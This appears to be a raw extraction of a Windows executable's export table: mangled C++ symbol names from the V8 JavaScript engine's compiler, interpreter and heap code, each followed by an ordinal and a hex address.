                                                                                                                                                                                                        ?Float64Min@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ65320x140ecb0a0
                                                                                                                                                                                                        ?Float64Min@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z65330x140f21dd0
                                                                                                                                                                                                        ?Float64Mod@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V534@0@Z65340x140f21e30
                                                                                                                                                                                                        ?Float64Mod@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z65350x140f5a950
                                                                                                                                                                                                        ?Float64Mod@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ65360x140ecb0b0
                                                                                                                                                                                                        ?Float64Mod@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z65370x140f21ea0
                                                                                                                                                                                                        ?Float64Mul@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V534@0@Z65380x140f21f00
                                                                                                                                                                                                        ?Float64Mul@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ65390x140ecb0c0
                                                                                                                                                                                                        ?Float64Mul@MachineOperatorReducer@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@0@Z65400x141044c20
                                                                                                                                                                                                        ?Float64Mul@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z65410x140f21f70
                                                                                                                                                                                                        ?Float64Neg@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V534@@Z65420x140f21fd0
                                                                                                                                                                                                        ?Float64Neg@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ65430x140ecb0d0
                                                                                                                                                                                                        ?Float64Neg@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z65440x140f22030
                                                                                                                                                                                                        ?Float64NotEqual@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UBoolT@internal@v8@@@34@V?$TNode@UFloat64T@internal@v8@@@34@0@Z65450x140f22070
                                                                                                                                                                                                        ?Float64NotEqual@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z65460x140f220f0
                                                                                                                                                                                                        ?Float64OperatorFor@RepresentationChanger@compiler@internal@v8@@QEAAPEBVOperator@234@W4Value@IrOpcode@234@@Z65470x1410a4e30
                                                                                                                                                                                                        ?Float64Pow@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V534@0@Z65480x140f22150
                                                                                                                                                                                                        ?Float64Pow@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ65490x140ecb0e0
                                                                                                                                                                                                        ?Float64Pow@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z65500x140f221c0
                                                                                                                                                                                                        ?Float64PowHalf@MachineOperatorReducer@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@@Z65510x141044c80
                                                                                                                                                                                                        ?Float64Round@SimplifiedLowering@compiler@internal@v8@@AEAAPEAVNode@234@QEAV5234@@Z65520x14106f860
                                                                                                                                                                                                        ?Float64RoundDown@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V534@@Z65530x140f22220
                                                                                                                                                                                                        ?Float64RoundDown@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z65540x140f5a9d0
                                                                                                                                                                                                        ?Float64RoundDown@MachineOperatorBuilder@compiler@internal@v8@@QEAA?BVOptionalOperator@234@XZ65550x140ecb0f0
                                                                                                                                                                                                        ?Float64RoundDown@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z65560x140f22280
                                                                                                                                                                                                        ?Float64RoundTiesAway@MachineOperatorBuilder@compiler@internal@v8@@QEAA?BVOptionalOperator@234@XZ65570x140ecb110
                                                                                                                                                                                                        ?Float64RoundTiesAway@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z65580x140f222d0
                                                                                                                                                                                                        ?Float64RoundTiesEven@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V534@@Z65590x140f22320
                                                                                                                                                                                                        ?Float64RoundTiesEven@MachineOperatorBuilder@compiler@internal@v8@@QEAA?BVOptionalOperator@234@XZ65600x140ecb130
                                                                                                                                                                                                        ?Float64RoundTiesEven@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z65610x140f22380
                                                                                                                                                                                                        ?Float64RoundTruncate@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V534@@Z65620x140f223d0
                                                                                                                                                                                                        ?Float64RoundTruncate@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z65630x140f5aa70
                                                                                                                                                                                                        ?Float64RoundTruncate@MachineOperatorBuilder@compiler@internal@v8@@QEAA?BVOptionalOperator@234@XZ65640x140ecb150
                                                                                                                                                                                                        ?Float64RoundTruncate@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z65650x140f22430
                                                                                                                                                                                                        ?Float64RoundUp@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V534@@Z65660x140f22480
                                                                                                                                                                                                        ?Float64RoundUp@MachineOperatorBuilder@compiler@internal@v8@@QEAA?BVOptionalOperator@234@XZ65670x140ecb170
                                                                                                                                                                                                        ?Float64RoundUp@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z65680x140f224e0
                                                                                                                                                                                                        ?Float64Select@MachineOperatorBuilder@compiler@internal@v8@@QEAA?BVOptionalOperator@234@XZ65690x140ecb190
                                                                                                                                                                                                        ?Float64Select@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@00@Z65700x140f22530
                                                                                                                                                                                                        ?Float64Sign@SimplifiedLowering@compiler@internal@v8@@AEAAPEAVNode@234@QEAV5234@@Z65710x14106fa10
                                                                                                                                                                                                        ?Float64SilenceNaN@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V534@@Z65720x140f225a0
                                                                                                                                                                                                        ?Float64SilenceNaN@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z65730x140f5ab10
                                                                                                                                                                                                        ?Float64SilenceNaN@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ65740x140ecb1b0
                                                                                                                                                                                                        ?Float64SilenceNaN@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z65750x140f22600
                                                                                                                                                                                                        ?Float64Sin@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V534@@Z65760x140f22640
                                                                                                                                                                                                        ?Float64Sin@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ65770x140ecb1c0
                                                                                                                                                                                                        ?Float64Sin@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z65780x140f226a0
                                                                                                                                                                                                        ?Float64Sinh@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V534@@Z65790x140f226e0
                                                                                                                                                                                                        ?Float64Sinh@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ65800x140ecb1d0
                                                                                                                                                                                                        ?Float64Sinh@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z65810x140f22740
                                                                                                                                                                                                        ?Float64Sqrt@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V534@@Z65820x140f22780
                                                                                                                                                                                                        ?Float64Sqrt@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ65830x140ecb1e0
                                                                                                                                                                                                        ?Float64Sqrt@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z65840x140f227e0
                                                                                                                                                                                                        ?Float64Sub@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V534@0@Z65850x140f22820
                                                                                                                                                                                                        ?Float64Sub@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z65860x140f5ab70
                                                                                                                                                                                                        ?Float64Sub@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ65870x140ecb1f0
                                                                                                                                                                                                        ?Float64Sub@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z65880x140f22890
                                                                                                                                                                                                        ?Float64Tan@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V534@@Z65890x140f228f0
                                                                                                                                                                                                        ?Float64Tan@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ65900x140ecb200
                                                                                                                                                                                                        ?Float64Tan@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z65910x140f22950
                                                                                                                                                                                                        ?Float64Tanh@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V534@@Z65920x140f22990
                                                                                                                                                                                                        ?Float64Tanh@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ65930x140ecb210
                                                                                                                                                                                                        ?Float64Tanh@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z65940x140f229f0
                                                                                                                                                                                                        ?Float@AsmType@wasm@internal@v8@@SAPEAV1234@XZ65950x140632890
                                                                                                                                                                                                        ?FloatQ@AsmType@wasm@internal@v8@@SAPEAV1234@XZ65960x1406328a0
                                                                                                                                                                                                        ?FloatQDoubleQ@AsmType@wasm@internal@v8@@SAPEAV1234@XZ65970x1404bf180
                                                                                                                                                                                                        ?Floatish@AsmType@wasm@internal@v8@@SAPEAV1234@XZ65980x1406328b0
                                                                                                                                                                                                        ?FloatishDoubleQ@AsmType@wasm@internal@v8@@SAPEAV1234@XZ65990x1406328c0
                                                                                                                                                                                                        ?FloodWithOneShot@Debug@internal@v8@@AEAAXV?$Handle@VSharedFunctionInfo@internal@v8@@@23@_N@Z66000x140a60200
                                                                                                                                                                                                        ?Flush@BytecodeRegisterOptimizer@interpreter@internal@v8@@QEAAXXZ66010x1408f7fe0
                                                                                                                                                                                                        ?Flush@OptimizingCompileDispatcher@internal@v8@@QEAAXW4BlockingBehavior@23@@Z66020x140a7aa00
                                                                                                                                                                                                        ?FlushICache@CpuFeatures@internal@v8@@CAXPEAX_K@Z66030x140078990
                                                                                                                                                                                                        ?FlushInputQueue@OptimizingCompileDispatcher@internal@v8@@AEAAXXZ66040x140a7aaa0
                                                                                                                                                                                                        ?FlushInstructionCache@internal@v8@@YAXPEAX_K@Z66050x140aa0510
                                                                                                                                                                                                        ?FlushInstructionCache@internal@v8@@YAX_K0@Z66060x140476710
                                                                                                                                                                                                        ?FlushMemoryChunkData@ConcurrentMarking@internal@v8@@QEAAXPEAVMajorNonAtomicMarkingState@23@@Z66070x1409ec900
                                                                                                                                                                                                        ?FlushNativeContexts@ConcurrentMarking@internal@v8@@QEAAXPEAVNativeContextStats@23@@Z66080x1409eca50
                                                                                                                                                                                                        ?FlushOutputQueue@OptimizingCompileDispatcher@internal@v8@@AEAAX_N@Z66090x140a7ac60
                                                                                                                                                                                                        ?FlushQueues@OptimizingCompileDispatcher@internal@v8@@AEAAXW4BlockingBehavior@23@_N@Z66100x140a7ad10
                                                                                                                                                                                                        ?FlushWrapperCacheIfFull@ProcessingScope@LocalEmbedderHeapTracer@internal@v8@@AEAAXXZ66110x1409e6240
                                                                                                                                                                                                        ?FoldConstant@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ66120x140eb3620
                                                                                                                                                                                                        ?For@ConsumedPreparseData@internal@v8@@SA?AV?$unique_ptr@VConsumedPreparseData@internal@v8@@U?$default_delete@VConsumedPreparseData@internal@v8@@@std@@@std@@PEAVIsolate@23@V?$Handle@VPreparseData@internal@v8@@@23@@Z66130x1407a0230
                                                                                                                                                                                                        ?For@ScannerStream@internal@v8@@SAPEAVUtf16CharacterStream@23@PEAVExternalSourceStream@ScriptCompiler@3@W4Encoding@StreamedSource@63@@Z66140x1407707c0
                                                                                                                                                                                                        ?For@ScannerStream@internal@v8@@SAPEAVUtf16CharacterStream@23@PEAVIsolate@23@V?$Handle@VString@internal@v8@@@23@@Z66150x1407709a0
                                                                                                                                                                                                        ?For@ScannerStream@internal@v8@@SAPEAVUtf16CharacterStream@23@PEAVIsolate@23@V?$Handle@VString@internal@v8@@@23@HH@Z66160x1407709b0
                                                                                                                                                                                                        ?For@Symbol@v8@@SA?AV?$Local@VSymbol@v8@@@2@PEAVIsolate@2@V?$Local@VString@v8@@@2@@Z66170x140b12400
                                                                                                                                                                                                        ?For@Type@compiler@internal@v8@@SA?AV1234@AEBVMapRef@234@@Z66180x1404bbbf0
                                                                                                                                                                                                        ?ForApi@Private@v8@@SA?AV?$Local@VPrivate@v8@@@2@PEAVIsolate@2@V?$Local@VString@v8@@@2@@Z66190x140b12440
                                                                                                                                                                                                        ?ForApi@Symbol@v8@@SA?AV?$Local@VSymbol@v8@@@2@PEAVIsolate@2@V?$Local@VString@v8@@@2@@Z66200x140b12480
                                                                                                                                                                                                        ?ForArgumentsCallee@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ66210x141089b50
                                                                                                                                                                                                        ?ForArgumentsLength@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ66220x141089ba0
                                                                                                                                                                                                        ?ForBigIntBitfield@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ66230x141089bf0
                                                                                                                                                                                                        ?ForBigIntLeastSignificantDigit64@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ66240x141089c50
                                                                                                                                                                                                        ?ForBigIntOptionalPadding@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ66250x141089cb0
                                                                                                                                                                                                        ?ForCellValue@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ66260x141089d10
                                                                                                                                                                                                        ?ForConsStringFirst@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ66270x141089d50
                                                                                                                                                                                                        ?ForConsStringSecond@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ66280x141089da0
                                                                                                                                                                                                        ?ForContextSlot@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@_K@Z66290x141089df0
                                                                                                                                                                                                        ?ForContextSlotKnownPointer@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@_K@Z66300x141089e40
                                                                                                                                                                                                        ?ForDescriptorArrayEnumCache@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ66310x141089e90
                                                                                                                                                                                                        ?ForDictionaryNextEnumerationIndex@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ66320x141089ee0
                                                                                                                                                                                                        ?ForDictionaryObjectHashIndex@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ66330x141089f40
                                                                                                                                                                                                        ?ForEachTransitionTo@TransitionsAccessor@internal@v8@@QEAAXVName@23@AEBV?$function@$$A6AXVMap@internal@v8@@@Z@std@@PEAV?$CombinationAssertScope@V?$PerThreadAssertScopeDebugOnly@$0A@$0A@@internal@v8@@V?$PerThreadAssertScopeDebugOnly@$00$0A@@23@@23@@Z66340x1407bc5d0
                                                                                                                                                                                                        ?ForEnumCacheIndices@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ66350x141089e90
                                                                                                                                                                                                        ?ForEnumCacheKeys@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ66360x141089fa0
                                                                                                                                                                                                        ?ForExternalIntPtr@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ66370x141089ff0
                                                                                                                                                                                                        ?ForExternalStringResourceData@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ66380x14108a030
                                                                                                                                                                                                        ?ForFeedbackCellInterruptBudget@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ66390x14108a080
                                                                                                                                                                                                        ?ForFeedbackCellValue@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ66400x14108a0e0
                                                                                                                                                                                                        ?ForFeedbackVectorClosureFeedbackCellArray@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ66410x14108a130
                                                                                                                                                                                                        ?ForFeedbackVectorFlags@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ66420x14108a180
                                                                                                                                                                                                        ?ForFeedbackVectorInvocationCount@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ66430x14108a1e0
                                                                                                                                                                                                        ?ForFeedbackVectorSlot@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@H@Z66440x14108a240
                                                                                                                                                                                                        ?ForFixedArrayElement@AccessBuilder@compiler@internal@v8@@SA?AUElementAccess@234@W4ElementsKind@34@W4LoadSensitivity@34@@Z66450x14108a290
                                                                                                                                                                                                        ?ForFixedArrayElement@AccessBuilder@compiler@internal@v8@@SA?AUElementAccess@234@XZ66460x14108a380
                                                                                                                                                                                                        ?ForFixedArrayLength@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ66470x14108a3c0
                                                                                                                                                                                                        ?ForFixedArraySlot@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@_KW4WriteBarrierKind@234@@Z66480x14108a420
                                                                                                                                                                                                        ?ForFixedDoubleArrayElement@AccessBuilder@compiler@internal@v8@@SA?AUElementAccess@234@XZ66490x14108a470
                                                                                                                                                                                                        ?ForFunctionCompile@UnoptimizedCompileFlags@internal@v8@@SA?AV123@PEAVIsolate@23@VSharedFunctionInfo@23@@Z66500x1407b2690
                                                                                                                                                                                                        ?ForHashTableBaseCapacity@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ66510x14108a4c0
                                                                                                                                                                                                        ?ForHashTableBaseNumberOfDeletedElement@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ66520x14108a520
                                                                                                                                                                                                        ?ForHashTableBaseNumberOfElements@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ66530x14108a580
                                                                                                                                                                                                        ?ForHeapNumberValue@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ66540x14108a5e0
                                                                                                                                                                                                        ?ForInContinue@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@VRegister@234@0@Z66550x14091ddd0
                                                                                                                                                                                                        ?ForInEnumerate@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@VRegister@234@@Z66560x14091ddf0
                                                                                                                                                                                                        ?ForInEnumerate@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ66570x140f3c520
                                                                                                                                                                                                        ?ForInNext@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@VRegister@234@0VRegisterList@234@H@Z66580x14091df70
                                                                                                                                                                                                        ?ForInNext@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4ForInMode@234@AEBUFeedbackSource@234@@Z66590x140f3c530
                                                                                                                                                                                                        ?ForInPrepare@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@VRegisterList@234@H@Z66600x14091e030
                                                                                                                                                                                                        ?ForInPrepare@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4ForInMode@234@AEBUFeedbackSource@234@@Z66610x140f3c600
                                                                                                                                                                                                        ?ForInStep@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@VRegister@234@@Z66620x14091e200
                                                                                                                                                                                                        ?ForJSArrayBufferBitField@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ66630x14108a640
                                                                                                                                                                                                        ?ForJSArrayBufferViewBuffer@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ66640x14108a6a0
                                                                                                                                                                                                        ?ForJSArrayBufferViewByteLength@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ66650x14108a6f0
                                                                                                                                                                                                        ?ForJSArrayBufferViewByteOffset@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ66660x14108a750
                                                                                                                                                                                                        ?ForJSArrayIteratorIteratedObject@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ66670x14108a7b0
                                                                                                                                                                                                        ?ForJSArrayIteratorKind@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ66680x14108a800
                                                                                                                                                                                                        ?ForJSArrayIteratorNextIndex@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ66690x14108a860
                                                                                                                                                                                                        ?ForJSArrayLength@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@W4ElementsKind@34@@Z66700x14108a8c0
                                                                                                                                                                                                        ?ForJSAsyncFunctionObjectPromise@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ66710x14108a960
                                                                                                                                                                                                        ?ForJSAsyncGeneratorObjectIsAwaiting@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ66720x14108a9b0
                                                                                                                                                                                                        ?ForJSAsyncGeneratorObjectQueue@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ66730x14108aa10
                                                                                                                                                                                                        ?ForJSBoundFunctionBoundArguments@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ66740x14108aa60
                                                                                                                                                                                                        ?ForJSBoundFunctionBoundTargetFunction@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ66750x14108aab0
                                                                                                                                                                                                        ?ForJSBoundFunctionBoundThis@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ66760x141089b50
                                                                                                                                                                                                        ?ForJSCollectionIteratorIndex@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ66770x14108ab00
                                                                                                                                                                                                        ?ForJSCollectionIteratorTable@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ66780x14108a6a0
                                                                                                                                                                                                        ?ForJSCollectionTable@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ66790x14108a6a0
                                                                                                                                                                                                        ?ForJSDataViewDataPointer@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ66800x14108ab60
                                                                                                                                                                                                        ?ForJSDateField@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@W4FieldIndex@JSDate@34@@Z66810x14108abb0
                                                                                                                                                                                                        ?ForJSDateValue@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ66820x14108ac00
                                                                                                                                                                                                        ?ForJSFunctionCode@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ66830x14108ac60
                                                                                                                                                                                                        ?ForJSFunctionContext@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ66840x14108acb0
                                                                                                                                                                                                        ?ForJSFunctionFeedbackCell@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ66850x14108aa60
                                                                                                                                                                                                        ?ForJSFunctionPrototypeOrInitialMap@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ66860x14108ad00
                                                                                                                                                                                                        ?ForJSFunctionSharedFunctionInfo@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ66870x14108a6a0
                                                                                                                                                                                                        ?ForJSGeneratorObjectContext@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ66880x14108acb0
                                                                                                                                                                                                        ?ForJSGeneratorObjectContinuation@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ66890x14108ad50
                                                                                                                                                                                                        ?ForJSGeneratorObjectFunction@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ66900x14108adb0
                                                                                                                                                                                                        ?ForJSGeneratorObjectInputOrDebugPos@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ66910x14108ae00
                                                                                                                                                                                                        ?ForJSGeneratorObjectParametersAndRegisters@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ66920x14108ae50
                                                                                                                                                                                                        ?ForJSGeneratorObjectReceiver@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ66930x14108aa60
                                                                                                                                                                                                        ?ForJSGeneratorObjectResumeMode@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ66940x14108aea0
                                                                                                                                                                                                        ?ForJSGlobalProxyNativeContext@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ66950x14108af00
                                                                                                                                                                                                        ?ForJSIteratorResultDone@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ66960x141089b50
                                                                                                                                                                                                        ?ForJSIteratorResultValue@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ66970x141089ba0
                                                                                                                                                                                                        ?ForJSObjectElements@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ66980x14108af50
                                                                                                                                                                                                        ?ForJSObjectInObjectProperty@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@AEBVMapRef@234@HVMachineType@34@@Z66990x14108af90
                                                                                                                                                                                                        ?ForJSObjectOffset@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@HW4WriteBarrierKind@234@@Z67000x14108aff0
                                                                                                                                                                                                        ?ForJSObjectPropertiesOrHash@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ67010x141089d10
                                                                                                                                                                                                        ?ForJSObjectPropertiesOrHashKnownPointer@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ67020x14108b030
                                                                                                                                                                                                        ?ForJSRegExpData@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ67030x141089ba0
                                                                                                                                                                                                        ?ForJSRegExpFlags@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ67040x14108b070
                                                                                                                                                                                                        ?ForJSRegExpLastIndex@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ67050x14108ae00
                                                                                                                                                                                                        ?ForJSRegExpSource@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ67060x141089b50
                                                                                                                                                                                                        ?ForJSStringIteratorIndex@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ67070x14108b0c0
                                                                                                                                                                                                        ?ForJSStringIteratorString@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ67080x141089da0
                                                                                                                                                                                                        ?ForJSTypedArrayBasePointer@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ67090x14108b120
                                                                                                                                                                                                        ?ForJSTypedArrayExternalPointer@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ67100x14108b160
                                                                                                                                                                                                        ?ForJSTypedArrayLength@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ67110x14108b1a0
                                                                                                                                                                                                        ?ForMap@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@W4WriteBarrierKind@234@@Z67120x14108b200
                                                                                                                                                                                                        ?ForMapBitField2@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ67130x14108b240
                                                                                                                                                                                                        ?ForMapBitField3@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ67140x14108a080
                                                                                                                                                                                                        ?ForMapBitField@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ67150x14108b2a0
                                                                                                                                                                                                        ?ForMapDescriptors@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ67160x14108b300
                                                                                                                                                                                                        ?ForMapInstanceType@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ67170x14108b350
                                                                                                                                                                                                        ?ForMapNativeContext@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ67180x14108b3b0
                                                                                                                                                                                                        ?ForMapPrototype@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ67190x14108b400
                                                                                                                                                                                                        ?ForModuleRegularExports@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ67200x14108b450
                                                                                                                                                                                                        ?ForModuleRegularImports@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ67210x14108b4a0
                                                                                                                                                                                                        ?ForNameRawHashField@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ67220x14108b4f0
                                                                                                                                                                                                        ?ForOrderedHashMapEntryValue@AccessBuilder@compiler@internal@v8@@SA?AUElementAccess@234@XZ67230x14108b540
                                                                                                                                                                                                        ?ForOrderedHashMapOrSetNextTable@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ67240x14108b580
                                                                                                                                                                                                        ?ForOrderedHashMapOrSetNumberOfBuckets@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ67250x14108ab00
